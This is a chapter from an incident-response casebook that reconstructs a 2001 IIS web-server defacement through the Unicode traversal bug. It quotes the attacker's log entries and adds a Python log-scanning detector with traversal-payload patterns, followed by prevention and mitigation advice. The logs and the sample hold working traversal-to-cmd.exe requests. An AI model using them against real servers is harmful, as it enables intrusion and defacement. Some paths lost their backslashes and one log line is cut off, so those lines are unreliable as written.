The French Connection
by Bill Pennington, Guardent, Inc.
Copyright 2002 by The McGraw-Hill Companies, Inc.
Puzzled by what appeared to be a lack of evidence, the I.T. staff began to research Web defacement attacks and soon discovered that the Web server software they were using, Microsoft’s IIS Web server version 5.0, had a well-known bug that easily allowed attackers to take control of the machine. The bug the attacker exploited, the “Web server file request parsing vulnerability” (better known as the “Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886.
This was an unsettling discovery for the I.T. staff; they realized that this server
was on the inside of the network when it was compromised. Therefore, the attacker
could now have backdoors to any number of systems inside the network, as well as
copies of sensitive data and passwords.
Once the I.T. staff knew the probable method of entry, the well-known Unicode Web server bug, they began to piece together the attack. The bug relies on the ability to execute a system shell, a program called cmd.exe, in order to execute commands on the Web server. The I.T. staff found that if this bug had been used, evidence of the attack would be in the Web server log files. They collected all of the log files from the Web server and imported them into a database for analysis. As cmd.exe is not a normally occurring string in Web server log files, they performed a search for that string and found the following:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
This was the first probe. If successful, the attacker would get a directory listing of the victim computer’s C drive. This is a common, non-invasive technique employed by automated scanning programs to test whether a computer is vulnerable to this bug, without causing any damage.
The next entry was another probe, looking at the directory listing of the D drive,
if it existed:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The following 13 log file entries show the attacker retrieving various directory listings in order to get the lay of the land, so he could become familiar with the environment. This involved retrieving more directory listings, as well as viewing the victim’s home page.
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 47 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
198 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html
Once the attacker had a better understanding of the environment, the attack began. First, he renamed an auxiliary Web page to test his capabilities:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:wwwrootdetour.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Next, he created a directory, c:ArA, to set up shop; copied cmd.exe to his
work area; and renamed it cmd1.exe:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+md+c:ArA 502 355 488 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:winntsystem32cmd.Exe+c:ArAcmd1.exe 502 382 524 125 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The preceding is the last entry for the cmd.exe search. It becomes clear that the
attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe
turned up the entries that follow.
In the first entry for the cmd1.exe search, the attacker built the Web page he
wanted to use to replace the real Web page on the server:
03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<br>Someone+should+check+your+system+security+coz+you+sure+aren't.<br></h2>"+>+c:ArAdefault.htm 502 355 763 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The attacker made a backup of the original Web site:
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+rename+d:wwwrootindex.html+index.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
Finally, the attacker copied the defaced Web site over the original Web site and viewed his handiwork:
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:ArAdefault.htm+d:wwwrootindex.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
As you can see from the log files, the attack from start to finish took just ten minutes.
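Detection logic of the kind the I.T. staff applied, as an added example that is not from the book: it parses lines in the field order of the listing above, decodes the overlong separators the bug relied on, and flags traversal, executable requests and shell switches rather than the literal string cmd.exe, so the copied cmd1.exe is caught by the same rule. The sample lines, and the 10.0.0.5 client in the last one, are constructed for the example.

```python
import re
from urllib.parse import unquote

# Field order of the book's listing (W3C extended format, whitespace separated).
FIELDS = ("date", "time", "client", "site", "server", "host", "port", "method",
          "uri", "query", "status", "sent", "received", "taken", "vhost", "agent")

OVERLONG = re.compile(r"%c0%af|%c1%9c", re.I)   # overlong UTF-8 for "/" and "\"
TRAVERSAL = re.compile(r"\.\.[/\\]")             # "../" or "..\" after decoding
EXECUTABLE = re.compile(r"\.(exe|bat|cmd)$", re.I)
SHELL_SWITCH = re.compile(r"^/c(\+|$)", re.I)    # "/c+..." is a command for a shell

# Constructed sample: lines 1, 3 and 4 mimic the book's pattern, line 2 is benign.
SAMPLE_LOG = """\
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/../../ArA/cmd1.exe /c+copy+c:\\ArA\\default.htm+d:\\wwwroot\\index.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:12 10.0.0.5 W3SVC1 WWW-2K WWW-2K.victim.com 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 730 484 31 www.victim.com Mozilla/4.0
"""


def parse_line(line):
    """Split one log line into a dict; None for blank or truncated lines."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) >= len(FIELDS) else None


def classify(entry):
    """Return the rule names an entry triggers (empty list if benign)."""
    # Approximate what the unpatched server did: turn the overlong bytes into
    # separators first, then apply ordinary percent-decoding.
    decoded = unquote(OVERLONG.sub("/", entry["uri"]))
    hits = []
    if TRAVERSAL.search(decoded):
        hits.append("traversal")
    if EXECUTABLE.search(decoded):          # cmd.exe, but also the copied cmd1.exe
        hits.append("executable")
    if SHELL_SWITCH.match(entry["query"]):
        hits.append("shell_switch")
    return hits


def scan(log_text):
    """Return (line_no, client, time, hits) for every suspicious entry."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        entry = parse_line(line)
        hits = classify(entry) if entry else []
        if hits:
            findings.append((no, entry["client"], entry["time"], hits))
    return findings
```

Run over the full log export, the output gives the timeline and client for every traversal request, which is the pivot point the text describes when the cmd.exe search went quiet and the cmd1.exe search had to begin.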
ANSWERS
1. The attacker used the “Web server file request parsing vulnerability,” as
detailed in the CVE database under #CVE-2000-0886, to get into the Web
server.
2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe,
which obfuscated the audit trail, forcing the forensic investigator to
follow a new log pattern.
PREVENTION
Prevention of this attack would have been simple if the software on the Web server had been kept up to date. The patch for the vulnerability the attacker used was released five months prior to the penetration. The patch in this case was in the form of a hot-fix, and at the time of this writing had not been rolled into a full service pack. The administrators had installed all the service packs but had failed to install the additional hot-fixes.
Proper hardening of the Web server could also have prevented this attack. When executing this attack, the attacker is issuing commands as the IUSR_COMPUTERNAME account. This account has no special administrative privileges on the Web server other than the privileges given to EVERYONE. The EVERYONE group, by default, has permission to execute all of the commands located in the %winnt%/system32 directory. On most servers of this kind, administrators are the only users that need to execute these commands from the console. Removing the rights for the EVERYONE group to execute the commands in the %winnt%/system32 directory would have prevented this attack, and most other attacks in the same class.
MITIGATION
To mitigate the damage caused by the penetration, the company decided to completely rebuild the Web server from scratch using the latest software available. While not always necessary, a complete rebuild is the best way to regain strong confidence in a machine’s software after a penetration. For continued security and accountability, the maintenance of the machine was assigned to a single person. In order to gain peace of mind, the company also ordered a security audit from an outside firm to assess any possible deeper penetration of their internal infrastructure. No further damage was found. However, a few weeks later, the company would again find themselves in need of security assistance; that story is detailed in Challenge 2, “The Insider.”
ADDITIONAL RESOURCES
The Honeynet project had a scan of the month of February 2001 that profiled a very
similar attack:
http://project.honeynet.org/scans/scan12/
Microsoft’s security bulletin for the vulnerability, including patch information:
http://www.microsoft.com/technet/security/bulletin/ms00-086.asp
The CVE entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886